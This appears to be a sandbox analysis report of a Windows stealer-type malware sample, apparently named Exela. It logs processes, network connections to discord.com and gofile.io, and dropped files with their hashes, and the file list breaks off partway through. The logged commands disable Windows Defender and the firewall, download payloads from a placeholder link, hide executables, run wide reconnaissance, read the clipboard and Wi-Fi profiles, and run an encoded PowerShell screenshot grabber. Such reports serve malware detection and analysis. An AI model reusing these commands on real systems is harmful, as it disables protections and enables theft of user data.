C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "gdb --version"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get Manufacturer

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get Manufacturer

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\curl.exe

curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqzb5d1s\yqzb5d1s.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\yqzb5d1s\CSCF6F01569631D4B3ABC3A426DD969DFBA.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:50080 tcp
N/A 127.0.0.1:50101 tcp
N/A 127.0.0.1:50106 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
N/A 127.0.0.1:50118 tcp
N/A 127.0.0.1:50120 tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.75.242.210:443 api.gofile.io tcp
US 8.8.8.8:53 store1.gofile.io udp
FR 45.112.123.227:443 store1.gofile.io tcp
N/A 127.0.0.1:50285 tcp
N/A 127.0.0.1:50287 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp

Files

memory/5492-0-0x0000000000010000-0x000000000123E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Exela.exe

MD5 c5669d422429ecf07edc2f00821ecd93
SHA1 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3
SHA256 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00
SHA512 d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253

C:\Users\Admin\AppData\Local\Temp\no defender.exe

MD5 c80d2a00b97cf55170b221f8a8f65e81
SHA1 a03c17751d8db91e1e66460093855dabbcfcc04b
SHA256 af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85
SHA512 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\_MEI15562\ucrtbase.dll

MD5 3b337c2d41069b0a1e43e30f891c3813
SHA1 ebee2827b5cb153cbbb51c9718da1549fa80fc5c
SHA256 c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7
SHA512 fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

C:\Users\Admin\AppData\Local\Temp\_MEI15562\python311.dll

MD5 db09c9bbec6134db1766d369c339a0a1
SHA1 c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b
SHA256 b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79
SHA512 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

C:\Users\Admin\AppData\Local\Temp\_MEI15562\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/6092-119-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat

MD5 bffa0b357688d06c9f66c79a5d091f8b
SHA1 bc20d3a70777c646a86e5c4b98f3a038f0821106
SHA256 d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df
SHA512 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_howav04c.czx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4380-129-0x000002A9799C0000-0x000002A9799E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15562\base_library.zip

MD5 65089bae0fe6af0f4d44313a26c87f16
SHA1 18449f77a946a7aadc7edf19c82006d22aaa487c
SHA256 d204f68e076e4662bc8a585ff8cdfe3f0fc602ecc2e2f12afbe23b25425869d8
SHA512 0c710bcaa747debdee12fa181afdeba6b24b77280b07d65cfeacc6a7d327c7af6f8c559e01701d65f5219197ea756df023b6b04ed826ea31f27f74cb776b1618

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libffi-8.dll

MD5 decbba3add4c2246928ab385fb16a21e
SHA1 5f019eff11de3122ffa67a06d52d446a3448b75e
SHA256 4b43c1e42f6050ddb8e184c8ec4fb1de4a6001e068ece8e6ad47de0cc9fd4a2d
SHA512 760a42a3eb3ca13fa7b95d3bd0f411c270594ae3cf1d3cda349fa4f8b06ebe548b60cd438d68e2da37de0bc6f1c711823f5e917da02ed7047a45779ee08d7012

memory/6092-182-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp

memory/6092-183-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp

memory/6092-185-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp

memory/6092-184-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp

memory/6092-181-0x00007FFF62650000-0x00007FFF62674000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15562\select.pyd

MD5 c39459806c712b3b3242f8376218c1e1
SHA1 85d254fb6cc5d6ed20a04026bff1158c8fd0a530
SHA256 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9
SHA512 b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d

C:\Users\Admin\AppData\Local\Temp\_MEI15562\pyexpat.pyd

MD5 fe0e32bfe3764ed5321454e1a01c81ec
SHA1 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb
SHA256 b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92
SHA512 d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libssl-1_1.dll

MD5 6cd33578bc5629930329ca3303f0fae1
SHA1 f2f8e3248a72f98d27f0cfa0010e32175a18487f
SHA256 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0
SHA512 c236a6ccc8577c85509d378c1ef014621cab6f6f4aa26796ff32d8eec8e98ded2e55d358a7d236594f7a48646dc2a6bf25b42a37aed549440d52873ebca4713e

C:\Users\Admin\AppData\Local\Temp\_MEI15562\libcrypto-1_1.dll

MD5 86cfc84f8407ab1be6cc64a9702882ef
SHA1 86f3c502ed64df2a5e10b085103c2ffc9e3a4130
